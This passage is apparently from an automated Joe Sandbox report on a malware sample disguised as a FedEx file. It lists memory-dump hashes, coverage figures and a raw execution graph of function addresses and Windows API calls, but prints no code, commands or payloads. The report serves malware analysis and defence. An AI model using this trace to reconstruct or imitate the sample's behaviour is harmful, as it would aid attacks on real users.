                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac345f52f5679e9a8c7a9b1f58fd27716e0390819878c9d0482b4f10ba232762
                  • Instruction ID: bb61d3a30b771c810e3daec2959e6809ac2bfd07f42c59fa5eff431886d10919
                  • Opcode Fuzzy Hash: ac345f52f5679e9a8c7a9b1f58fd27716e0390819878c9d0482b4f10ba232762
                  • Instruction Fuzzy Hash: 46D1C535C2075A8ACB11EF64D990699F7B1FF95200F20C7AAE50A37214EB74AAD5CF81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: af279b22f47e81af69cc35f78ec2629520cf0c4d9ab844f4a6513559b5dd9d45
                  • Instruction ID: ff4bd44b33bd26140e8e9a47abaf47f2a18637f0f03a808b2c14001ea57fbb2e
                  • Opcode Fuzzy Hash: af279b22f47e81af69cc35f78ec2629520cf0c4d9ab844f4a6513559b5dd9d45
                  • Instruction Fuzzy Hash: C0410970D497588FEB69CF6A8C007D9BFB6AF8A300F04C1EAD448A7266D7750986CF41

                  Execution Graph

                  Execution Coverage:31.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:4.4%
                  Total number of Nodes:1846
                  Total number of Limit Nodes:92
                  execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 